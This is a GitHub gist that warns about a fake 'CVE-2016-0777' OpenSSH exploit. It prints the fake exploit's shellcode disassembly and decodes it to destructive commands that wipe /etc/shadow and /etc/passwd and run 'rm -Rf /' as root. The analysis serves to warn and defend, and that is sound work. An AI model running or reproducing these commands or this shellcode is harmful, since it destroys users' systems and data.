Created
January 16, 2016 15:53
-
-
Save alexanderkent/f0d84612569582e6fdab to your computer and use it in GitHub Desktop.
CVE-2016-0777 roaming openssh exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://pastebin.com/T2zjAdZ5 | |
| A quick warning: this fake exploit going around is entirely malicious, and will not exploit the bug, but instead do | |
| bad things to your machine. | |
| If you actually read it, on lines 59 and 60, you'll see this: | |
| (*(void(*)())shellcode)(); | |
| exit(1); | |
| This runs the "shellcode" on your own box. Since it requires root to run (because, it says, | |
| "Need ROOT to bind to raw socket") you'll be giving that shellcode root privileges. | |
| And guess what it does... | |
| .data:00000000 6a 0b push 0xb | |
| .data:00000002 58 pop eax | |
| .data:00000003 99 cdq | |
| .data:00000004 52 push edx | |
| .data:00000005 66 68 2d 63 pushw 0x632d | |
| .data:00000009 89 e7 mov edi,esp | |
| .data:0000000b 68 2f 73 68 00 push 0x68732f | |
| .data:00000010 68 2f 62 69 6e push 0x6e69622f | |
| .data:00000015 89 e3 mov ebx,esp | |
| .data:00000017 52 push edx | |
| .data:00000018 e8 39 00 00 00 call 0x00000056 | |
| .data:0000001d 65 0x65 'e' | |
| .data:0000001e 63 0x63 'c' | |
| .data:0000001f 68 0x68 'h' | |
| .data:00000020 6f 0x6f 'o' | |
| .data:00000021 20 0x20 ' ' | |
| .data:00000022 22 0x22 '"' | |
| .data:00000023 22 0x22 '"' | |
| .data:00000024 20 0x20 ' ' | |
| .data:00000025 3e 0x3e '>' | |
| .data:00000026 20 0x20 ' ' | |
| .data:00000027 2f 0x2f '/' | |
| .data:00000028 65 0x65 'e' | |
| .data:00000029 74 0x74 't' | |
| .data:0000002a 63 0x63 'c' | |
| .data:0000002b 2f das | |
| .data:0000002c 73 0x73 's' | |
| .data:0000002d 68 0x68 'h' | |
| .data:0000002e 61 0x61 'a' | |
| .data:0000002f 64 0x64 'd' | |
| .data:00000030 6f 0x6f 'o' | |
| .data:00000031 77 0x77 'w' | |
| .data:00000032 20 0x20 ' ' | |
| .data:00000033 3b 0x3b ';' | |
| .data:00000034 20 0x20 ' ' | |
| .data:00000035 65 0x65 'e' | |
| .data:00000036 63 0x63 'c' | |
| .data:00000037 68 0x68 'h' | |
| .data:00000038 6f 0x6f 'o' | |
| .data:00000039 20 0x20 ' ' | |
| .data:0000003a 22 0x22 '"' | |
| .data:0000003b 22 0x22 '"' | |
| .data:0000003c 20 0x20 ' ' | |
| .data:0000003d 3e 0x3e '>' | |
| .data:0000003e 20 0x20 ' ' | |
| .data:0000003f 2f 0x2f '/' | |
| .data:00000040 65 0x65 'e' | |
| .data:00000041 74 0x74 't' | |
| .data:00000042 63 0x63 'c' | |
| .data:00000043 2f 0x2f '/' | |
| .data:00000044 70 0x70 'p' | |
| .data:00000045 61 0x61 'a' | |
| .data:00000046 73 0x73 's' | |
| .data:00000047 73 0x73 's' | |
| .data:00000048 77 0x77 'w' | |
| .data:00000049 64 0x64 'd' | |
| .data:0000004a 20 0x20 ' ' | |
| .data:0000004b 3b 0x3b ';' | |
| .data:0000004c 20 0x20 ' ' | |
| .data:0000004d 72 0x72 'r' | |
| .data:0000004e 6d 0x6d 'm' | |
| .data:0000004f 20 0x20 ' ' | |
| .data:00000050 2d 0x2d '-' | |
| .data:00000051 52 0x52 'R' | |
| .data:00000052 66 0x66 'f' | |
| .data:00000053 20 0x20 ' ' | |
| .data:00000054 2f 0x2f '/' | |
| .data:00000055 00 0x00 | |
| .data:00000056 57 push edi | |
| .data:00000057 53 push ebx | |
| .data:00000058 89 e1 mov ecx,esp | |
| .data:0000005a cd 80 int 0x80 | |
| Cutting that down, it essentially runs the following commands: | |
| echo "" > /etc/shadow | |
| echo "" > /etc/passwd | |
| rm -Rf / | |
| Never run untrusted exploit code, even if it looks legit at first glance. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment